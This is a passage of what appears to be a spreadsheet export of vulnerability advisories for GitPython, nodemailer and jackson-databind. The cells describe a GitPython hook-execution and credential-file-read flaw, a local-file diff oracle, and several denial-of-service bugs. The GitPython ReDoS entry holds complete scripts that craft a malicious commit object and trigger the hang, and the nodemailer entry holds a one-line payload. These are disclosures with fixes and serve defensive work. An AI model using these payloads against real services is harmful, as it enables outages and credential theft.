GitPython says it is         : /tmp/.../victim      &lt;- shadowed
attacker's hook executed     : True
git fsck                     : (clean)
```
The `pre-commit` hook runs at `git/index/base.py:1201`, before `write_tree()`, so it fires even though
the commit later fails.
### Impact
A service that opens or clones an untrusted repository with GitPython — a CI runner building a fork
pull request, a code-scanning/SBOM service, a mirror, a dependency bot, an AI code-review/agent tool —
can be made to:
1. **Execute arbitrary commands** via the tracked `&lt;root&gt;/hooks/pre-commit` when the victim calls
   `index.commit()`.
2. **Read files outside the repository**: the tracked `&lt;root&gt;/config` becomes the repository config and
   is parsed with `merge_includes=True` (`git/repo/base.py:765`), so `[include] path = ~/.aws/credentials`
   discloses the file. (`Repo._config_reader` still defaults `merge_includes=True`, so the hardening
   added in 3.1.59 for `.gitmodules`/GHSA-7833 does not cover this path.)
3. **Write a config file to an attacker-chosen directory** via an absolute tracked `commondir`.
Delivery is silent: `git clone` exits 0, `git fsck` (including `--strict`, and with
`transfer.fsckObjects`/`fetch.fsckObjects=true`) reports nothing, and the clone passes every read-only
probe (`head.commit`, `branches`, `is_dirty()`, `untracked_files`, `iter_commits`) because a tracked
`commondir` of `.git` pins `common_dir` to the real `.git`.
### Threat model / preconditions
- Attacker controls the content of a repository the victim opens or clones with GitPython (public repo,
  fork PR, mirrored dependency).
- For code execution, the victim performs a commit via GitPython's native `index.commit()`. For the
  file-read impact, opening the repo and reading config is enough.
- `GIT_WORK_TREE` is **not** a mitigation — `git_dir` is assigned and the discovery loop breaks before
  the environment is consulted.
- Real git is unaffected; only GitPython mis-resolves the directory.
### Remediation
1. Test `curpath/.git` **before** the `gitdir`/`commondir`/`HEAD` triple and before `is_git_dir(curpath)`.
2. Resolve `hook_path` / `_commit_hook_path` / `_get_validated_reflog_path` through `repo.common_dir`.
3. Containment-check `commondir`/`gitdir` contents before joining (reuse
   `SymbolicReference._get_validated_path`).
4. Validate `HEAD` in `is_git_dir` (require `ref: refs/...` or a 40-hex sha).
5. Pass `merge_includes=False` in `Repo._config_reader` (`git/repo/base.py:765`).
### Note for the maintainers
Commit `406b98e1` (2026-05-31, "respect core.hooksPath for commit hooks") resolved the hook path via
`git rev-parse --git-path`, which is immune because git rediscovers the true `.git`. Commit `9bc287a2`
(2026-07-20) reverted it to avoid an unconditional `rev-parse` dependency — reintroducing the exec step.
Measured at each commit with the healthy-looking layout: `406b98e1` → hook did not fire; `9bc287a2` …
`3.1.59` → hook fired.
### Scope note
Only the **repository-root** case is reported: where a real `.git` exists, git prefers it, and GitPython
does not. A fake git dir in a subdirectory fools real git too, so that variant is out of scope as a
general ecosystem hazard rather than a GitPython defect.
###POC Files :
[poc1_rce.py](https://github.com/user-attachments/files/31388464/poc1_rce.py)
[poc2_file_read.py](https://github.com/user-attachments/files/31388465/poc2_file_read.py)</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr"/>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr"/>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython 3.1.59 blocks a previously available local-file read path through unsafe git diff options such as -O/--orderfile.
However, the high-level diff API still permits --no-index with the default allow_unsafe_options=False.
--no-index changes the semantics of the paths arguments: instead of repository-relative pathspecs, Git interprets them as arbitrary filesystem paths.
When combined with the still-allowed -I/--ignore-matching-lines option, this creates a content-dependent Boolean oracle over a caller-selected local file.
This was reproduced against the published GitPython 3.1.59 wheel.
The original unsafe-option path is blocked in 3.1.59, while this alternate path remains reachable without setting allow_unsafe_options=True.
### Details
Confirmed API surface:
repo.index.diff(
    None,
    no_index=True,
    I=pattern,
    paths=[baseline_path, target_path],
    create_patch=True,
)
The relevant behavior is:
1. --no-index makes the two values supplied via paths filesystem operands rather than repository pathspecs.
2. -I/--ignore-matching-lines makes Git's result depend on whether the supplied regular expression matches the relevant file content.
3. GitPython exposes the resulting bit through distinguishable behavior:
   - matching condition: normal return with an empty DiffIndex
   - non-matching condition: GitCommandError with exit status 1
An application that forwards attacker-influenced diff options and paths and exposes the success/error distinction can therefore be queried repeatedly to recover a guessable local single-line secret.
The issue was confirmed with the default allow_unsafe_options=False.
The behavior does not require the caller to explicitly opt into GitPython's unsafe-option mode.
Verified intended security boundary:
- GitPython 3.1.58 accepts the earlier -O/--orderfile local-file input path.
- GitPython 3.1.59 rejects that same path with UnsafeOptionError.
- GitPython 3.1.59 still permits the --no-index alternate path described above.
This appears to be an alternate route to the same local-file confidentiality property that the 3.1.59 diff option hardening is intended to protect.
### PoC
A minimal reproducer, controlled extraction demonstrator, proof matrix, and proposed remediation are included in the attached package.
[gitpython-3159-maintainer-evidence.zip](https://github.com/user-attachments/files/31123571/gitpython-3159-maintainer-evidence.zip)
The minimal reproducer creates only temporary researcher-controlled files and demonstrates the following predicate:
correct prefix   -&gt; normal GitPython return
incorrect prefix -&gt; GitCommandError(status=1)
In the controlled extraction test, I generated three independent random single-line values and recovered all three exactly through repeated calls to the GitPython high-level API.
Result: 3/3 recovered.
The extraction harness also installs a Python audit hook that rejects direct Python open() access to the target file during the oracle phase. The content-dependent read is therefore performed by the child git process invoked through GitPython rather than by the reproduction script directly.
Controls were also tested:
- normal repository-scoped diff: no secret disclosure
- same outside paths without --no-index: no arbitrary-filesystem interpretation
- deliberately incorrect predicate: status 1 as expected
Suggested remediation is to classify --no-index as unsafe for the high-level diff API unless the caller explicitly sets allow_unsafe_options=True.
### Impact
Potential impact is disclosure of local files readable by the process running GitPython.
Exploitation requires an embedding application to allow an attacker to influence:
1. the relevant diff options,
2. both path operands, and
3. repeated requests while exposing a distinguishable success/error result.
The demonstrated attack is a blind content oracle rather than a one-request in-band file read. It is particularly applicable to short or structured single-line secrets where the target path and approximate value format are known or guessable.
Confirmed affected release: GitPython 3.1.59.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr"/>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython's `Actor.name_email_regex` regular expression (`git/util.py`, line 863)
is vulnerable to catastrophic backtracking (ReDoS — Regular Expression Denial of
Service). When GitPython parses the `author` or `committer` header of a git commit
object that contains a long string with an unterminated `&lt;` (no matching `&gt;`), the
Python regex engine enters quadratic backtracking, causing complete single-threaded
CPU exhaustion proportional to the square of the input length.
A single crafted commit object can block any GitPython API call that reads
`.author` or `.committer` for **over two minutes per invocation**, enabling denial
of service against CI runners, code-hosting backends, repository-scanning
pipelines, or any service that processes commits from third-party or untrusted
repositories.
---
### Details
**Vulnerable file and line:**
`git/util.py`, line 863:
```python
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
```
This regex is evaluated inside `Actor._from_string()` (line 909) every time
GitPython resolves a commit's `.author` or `.committer` property.
**Full call chain — from public API to vulnerable sink:**
commit.author # any ordinary GitPython API call
└── git/objects/commit.py:917
Commit._deserialize()
└── git/objects/util.py:341
parse_actor_and_date(author_line)
└── git/util.py:909
Actor._from_string(string)
└── Actor.name_email_regex.search(string) ← VULNERABLE
`author_line` is decoded directly from the raw bytes of the git commit object with
**no length limit, character restriction, or timeout** applied at any point before
reaching the regex engine. The same chain is triggered by:
- `commit.author`
- `commit.committer`
- `repo.iter_commits()`
- `repo.blame()`
- Any web service / CI tool that displays or processes commit metadata
**Why this pattern backtracks catastrophically:**
The pattern `(.*) &lt;(.*?)&gt;` contains an unbounded greedy group `(.*)` followed by
a literal space and `&lt;`. When the input is a long string that contains `&lt;` but no
closing `&gt;`, the regex engine must try every possible split position for the greedy
group — O(n²) candidate positions for a string of length n — each of which then
drives the inner lazy group into further sub-match attempts. This is the
well-documented "catastrophic backtracking" failure mode for this family of
patterns.
**Empirically measured scaling (tested against GitPython 3.1.59, commit 52a6cba):**
| Author field length (bytes) | Time to resolve `.author` |
|-----------------------------|--------------------------|
| 1,000  | 0.0035 s |
| 5,000  | 0.084 s  |
| 10,000 | 0.341 s  |
| 20,000 | 1.525 s  |
| 40,000 | 5.963 s  |
| 60,000 | 13.360 s |
| 80,000 | 23.871 s |
| **200,000** | **150.488 s** |
Each doubling of input size roughly quadruples processing time (e.g. 40,000 →
80,000 bytes: 5.96 s → 23.87 s ≈ 4.0×), confirming O(n²) growth. Git itself
imposes **no practical size limit** on author name fields in the object format.
**How the malicious object reaches a victim:**
The PoC creates the commit object as a correctly SHA-1-hashed, zlib-compressed git
loose object written directly into `.git/objects/`. `git cat-file -t &lt;sha&gt;` confirms
it is a valid `commit` type and git's own read-side tools display it without error.
Only git's write-side tooling (`git commit --author`, `git update-index`,
explicit `git fsck`) applies the sanity checks that would reject a malformed author
line. Delivery paths that bypass those checks include:
- A git server with `receive.fsckObjects = false` (common in self-hosted deployments)
- A `.git` directory shipped as a tarball, backup, or zip archive
- A git bundle file
- Any automated mirror or import tool that operates at the object level
---
### PoC
**Environment used for testing:**
- GitPython 3.1.59, installed in editable mode from source (no code modifications)
- Python 3.12.3, git 2.43.0, Ubuntu 24.04
**Script 1 — craft the malicious repository (`craft_malicious_repo.py`):**
```python
#!/usr/bin/env python3
"""
Creates a git repository with one commit whose 'author' field is a large
string containing an unterminated '&lt;'. Bypasses git's write-side sanity
checks by writing the raw object directly into .git/objects/.
Usage: python3 craft_malicious_repo.py &lt;target_dir&gt; &lt;payload_size_bytes&gt;
"""
import hashlib, os, subprocess, sys, zlib
def run(cmd, cwd):
    return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True)
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;target_dir&gt; &lt;payload_size_bytes&gt;")
        sys.exit(1)
    target_dir, payload_size = sys.argv[1], int(sys.argv[2])
    os.makedirs(target_dir, exist_ok=True)
    run(["git", "init", "--quiet"], cwd=target_dir)
    run(["git", "config", "user.email", "poc@example.com"], cwd=target_dir)
    run(["git", "config", "user.name", "PoC"], cwd=target_dir)
    with open(os.path.join(target_dir, "README.txt"), "w") as f:
        f.write("GitPython ReDoS PoC repository\n")
    run(["git", "add", "README.txt"], cwd=target_dir)
    tree_sha = run(["git", "write-tree"], cwd=target_dir).stdout.strip()
    malicious_name = "A" * payload_size
    # Key: author field contains a '&lt;' with no closing '&gt;'
    author_line    = f"author {malicious_name} &lt;unterminated 1691999972 -0700"
    committer_line = "committer PoC &lt;poc@example.com&gt; 1691999972 -0700"
    message        = "ReDoS PoC commit"
    commit_content = (
        f"tree {tree_sha}\n{author_line}\n{committer_line}\n\n{message}\n"
    ).encode()
    header     = f"commit {len(commit_content)}\x00".encode()
    store      = header + commit_content
    sha        = hashlib.sha1(store).hexdigest()
    compressed = zlib.compress(store)
    objdir = os.path.join(target_dir, ".git", "objects", sha[:2])
    os.makedirs(objdir, exist_ok=True)
    with open(os.path.join(objdir, sha[2:]), "wb") as f:
        f.write(compressed)
    run(["git", "update-ref", "refs/heads/master", sha], cwd=target_dir)
    print(f"Malicious commit sha : {sha}")
    print(f"Payload size         : {payload_size} bytes")
    verify = subprocess.run(
        ["git", "cat-file", "-t", sha],
        cwd=target_dir, capture_output=True, text=True
    )
    print(f"git cat-file -t confirms: {verify.stdout.strip()}")
if __name__ == "__main__":
    main()
```
**Script 2 — trigger the vulnerability (`trigger_redos.py`):**
```python
#!/usr/bin/env python3
"""
Opens the repository with GitPython and times commit.author access,
which triggers Actor._from_string() -&gt; Actor.name_email_regex.search().
Usage: python3 trigger_redos.py &lt;repo_dir&gt; &lt;commit_sha&gt;
"""
import sys, time, git
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;repo_dir&gt; &lt;commit_sha&gt;")
        sys.exit(1)
    repo   = git.Repo(sys.argv[1])
    commit = repo.commit(sys.argv[2])
    print("Accessing commit.author — triggers Actor._from_string()...")
    t0     = time.time()
    author = commit.author          # ← this single line causes the hang
    elapsed = time.time() - t0
    print(f"Author name length : {len(author.name)} chars")
    print(f"Elapsed            : {elapsed:.3f} seconds")
    print("RESULT: VULNERABLE" if elapsed &gt; 5 else "RESULT: not triggered")
if __name__ == "__main__":
    main()
```
**Execution and observed output:**
$ python3 craft_malicious_repo.py /tmp/victim-repo 200000
Malicious commit sha : 2450fbd5ab5ebfff430dab183d25678df9fd20de
Payload size : 200000 bytes
git cat-file -t confirms: commit
$ python3 trigger_redos.py /tmp/victim-repo 2450fbd5ab5ebfff430dab183d25678df9fd20de
Accessing commit.author — triggers Actor._from_string()...
Author name length : 200014 chars
Elapsed : 150.488 seconds
RESULT: VULNERABLE
**Docker reproduction (fully isolated environment):**
```bash
docker run --rm -it -v ~/gitpython-poc:/work -w /work python:3.8-bookworm bash
# Inside the container:
apt-get update &amp;&amp; apt-get install -y git
git clone --depth 1 https://github.com/gitpython-developers/GitPython.git /work/GitPython
pip install -e /work/GitPython
python3 /work/poc/craft_malicious_repo.py /work/victim-repo 200000
# note the SHA printed, then:
python3 /work/poc/trigger_redos.py /work/victim-repo &lt;SHA&gt;
```
The `python:3.8-bookworm` base image matches the one used in GitPython's own
`fuzzing/local-dev-helpers/Dockerfile`.
---
### Impact
**Who is affected:**
Any application that uses GitPython to parse commits from a source it does not
fully control. High-risk deployments include:
- **CI/CD systems** (Jenkins, GitLab CI, GitHub Actions self-hosted runners, etc.)
  that clone and inspect third-party pull requests — one malicious commit in a PR
  can stall every worker that processes it.
- **Code-hosting or code-review web services** that render commit author information
  — a single crafted push blocks every page render or API response that touches that
  commit's metadata.
- **Security or compliance scanners** that walk repository history across many
  repositories — one crafted object in any repository exhausts a scanner worker.
**Severity of impact:**
A 200 KB author field blocks a process for ~150 seconds per single `.author`
access. When `iter_commits()` or `blame` are used, every commit in a history
traversal can be independently crafted, multiplying the total hang time by the
number of commits processed. There is no confidentiality or integrity impact —
this is a pure availability / resource-exhaustion vulnerability.
---
### Suggested Fix
Replace the vulnerable pattern with one that cannot backtrack catastrophically.
The minimal, behavior-preserving fix is to exclude `&lt;` and `&gt;` from the name
group, removing the ambiguity that forces O(n²) backtracking:
```python
# git/util.py, line 863
# Before (vulnerable):
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
# After (fixed — identical output for all well-formed input):
name_email_regex = re.compile(r"([^&lt;&gt;]*) &lt;([^&lt;&gt;]*)&gt;")
```
Because the name group can no longer itself contain a `&lt;` character, the engine
has exactly one candidate position to try when a closing `&gt;` is absent — and fails
in O(n) time instead of O(n²). Legitimate actor strings (`Name &lt;email&gt;`) never
contain `&lt;` or `&gt;` in either field, so this change produces identical results for
all valid input.
As defense in depth, independently of the regex fix, bounding the maximum number
of characters GitPython will attempt to parse in an author/committer line (e.g.
rejecting strings longer than 4096 bytes before passing them to any regex) would
further limit the blast radius of any future ReDoS class in this parser.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90776</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr">
        <is>
          <t>10.0.5</t>
        </is>
      </c>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr"/>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>### Summary
`nodemailer/lib/addressparser` parses one shape of address in O(n^2) time. A single ~640 KB address value blocks the Node.js event loop for roughly 7 seconds. And it is reachable without auth: mailparser feeds inbound email headers straight into this parser, so one crafted email is enough to stall a service that parses mail.
### Details
The parser builds a single address by accumulating its atoms into one string. When the atoms are separated by RFC 5322 comments, like `a@b(c)@b(c)@b(c)...`, every atom re-joins that same growing string.
The join check in `src/addressparser/index.ts`:
```js
const joins =
    prevToken &amp;&amp;
    prevToken.noBreak &amp;&amp;
    parts.length &amp;&amp;
    (prevToken.value !== ')' || parts[parts.length - 1].slice(-1) === '@' || token.value.charAt(0) === '@');
```
The issue is the order of the last two operands. `parts[parts.length - 1].slice(-1)` runs before the cheap `token.value.charAt(0)`. `slice(-1)` has to flatten the accumulator to read its last character → O(current length) → and that runs on every token → O(n^2) over the whole value. Since `||` is left to right, the cheap `charAt(0)` that would short-circuit never gets the chance.
The chain: long comment-joined address → one growing accumulator → `slice(-1)` re-flattens it on every token → quadratic parse time.
### PoC
Isolated, just the parser (`npm i nodemailer@10.0.3`):
```js
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser('a' + '@b(c)'.repeat(130000));
console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
```
End to end through mailparser, the remote path (`npm i mailparser@3.9.24`):
```js
const { simpleParser } = require('mailparser');
(async () =&gt; {
  const to = 'a' + '@b(c)'.repeat(130000);
  const eml = `From: a@b.com\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n`;
  const s = Date.now();
  await simpleParser(eml);
  console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
})();
```
Timings measured on 10.0.3:
| Address value | Parse time |
| --- | --- |
| 390 KB | 1.3 s |
| 585 KB | 5.6 s |
| 640 KB | 6.7 s |
| 976 KB | 18 s |
It survives RFC 5322 folding: fold the header at offsets that are a multiple of the atom length and every `)`+`@` junction stays intact, so the payload is a standards-compliant email with lines under 998 octets and still triggers it.
### Impact
Algorithmic-complexity DoS. Node is single threaded, so the block stalls everything else in the process, and a handful of these back to back keeps a service down.
Affected: anything that runs `addressparser` on attacker-controlled input, either the public export directly or address headers built from user input. The unauthenticated remote case is mailparser. 3.9.24 pins nodemailer 10.0.3 and calls the parser on inbound `To`/`From`/`Cc` with no length cap, so any service parsing inbound mail with it can be frozen by a single email.
### Suggested fix
Swap the last two operands so the cheap check runs first:
```js
(prevToken.value !== ')' || token.value.charAt(0) === '@' || parts[parts.length - 1].slice(-1) === '@')
```
Pure boolean commutation, so the parse output is identical. Verified byte for byte on the test inputs, and the full 1276-test suite passes.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90776</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91776</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr"/>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>### Summary
With `@JsonTypeInfo(use = Id.NAME, defaultImpl = ...)`, every distinct unknown
raw type ID selects the same fallback deserializer but is retained as a
separate key in `TypeDeserializerBase._deserializers`. An attacker who can
repeatedly supply new unknown type IDs can grow this process-lifetime cache
without a configured bound.
### Details
The affected path is `TypeDeserializerBase._findDeserializer()`. After an
unknown name-based type ID resolves to the configured fallback/default
implementation, jackson-databind caches the result under the attacker-provided
raw `typeId`. Although all such IDs select the same fallback deserializer, each
new string remains a distinct cache key.
The behavior is runtime-confirmed in jackson-databind 2.22.1 and 3.2.1.
Current 2.22 and 3.2 source branches retained the unbounded `_deserializers`
map and per-raw-ID cache write when rechecked. The earlier affected floor has
not been established, patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must enable name-based polymorphism with a
`defaultImpl` or equivalent fallback, accept attacker-influenced type IDs, and
reuse a long-lived mapper/type deserializer across requests.
Suggested correction: avoid caching each unknown raw ID when every such ID
resolves to the same fallback, use a fallback sentinel, or use an explicitly
bounded concurrency-safe cache. A regression should contrast many distinct
unknown IDs with repetitions of one unknown ID across requests.
### PoC
Configure a polymorphic base type with
`@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, defaultImpl = Fallback.class)` and
deserialize inputs containing unknown type names through the same mapper.
Inspect `TypeDeserializerBase._deserializers` after the run.
On affected 2.x and 3.x versions, 10,000 distinct unknown raw type IDs produce
10,000 retained cache entries even though every input selects the same
fallback deserializer. A matched control that repeats one unknown ID 10,000
times produces one retained entry. This isolates attacker-controlled key
cardinality from ordinary request count.
### Impact
Where the stated polymorphic fallback configuration is exposed to
attacker-influenced type IDs, distinct inputs cause incremental
process-lifetime memory retention and eventual availability pressure or
denial of service. This is not claimed as a single-request allocation spike,
and no fixed bytes-per-ID or time-to-out-of-memory value is asserted. No
confidentiality, integrity, or code-execution impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91776</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91777</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr"/>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>### Summary
When an `@JsonIdentityInfo` collection or map first creates N unresolved
object-ID references and later resolves the same IDs in reverse order,
jackson-databind scans the remaining pending-reference accumulator for each
resolution. A shallow JSON document whose size grows linearly can therefore
cause quadratic CPU work during deserialization.
### Details
The affected path is forward-reference completion in
`CollectionDeserializer.CollectionReferringAccumulator.resolveForwardReference()`
and the corresponding map implementation. The implementation performs a
linear search of the pending accumulator for every resolved object ID.
The behavior is runtime-confirmed in jackson-databind 2.5.0, 2.22.1, and
3.2.1. Current 2.22 and 3.2 source branches retained the same design when
rechecked. A 2.4.0 control fails closed before successful reverse-order
completion, so 2.5.0 is the conservative runtime-confirmed affected floor.
The patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must deserialize attacker-influenced JSON into an
identity-enabled collection or map. The issue does not require deep nesting or
syntactically unusual JSON.
Suggested correction: replace repeated linear lookup/removal with a keyed
pending-reference structure or another design that provides linear or
amortized-linear completion. A regression should preserve input order,
duplicate-ID behavior, and unresolved-ID errors while bounding reverse-order
resolution work.
### PoC
The proof constructs a shallow collection containing N unresolved
`@JsonIdentityInfo` references followed by definitions of those same IDs in
reverse order. Its ID class counts `equals()` calls, giving a deterministic
work measure rather than a timing-dependent result.
With N=2,000, affected versions perform exactly 2,003,000 ID comparisons. An
equally sized control in which every reference is already resolved performs
zero comparisons in the pending-reference lookup path. The run is bounded to
a 512 MiB JVM. The result demonstrates quadratic growth: approximately
`N * (N + 1) / 2` comparisons, plus fixed setup comparisons.
### Impact
An unauthenticated source that can submit JSON to an application using the
affected identity-enabled collection or map shape can consume quadratic CPU
and exhaust a request-time or worker-capacity budget, causing denial of
service. The application model/configuration prerequisite is material. No
confidentiality, integrity, code-execution, or parser-depth impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91777</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
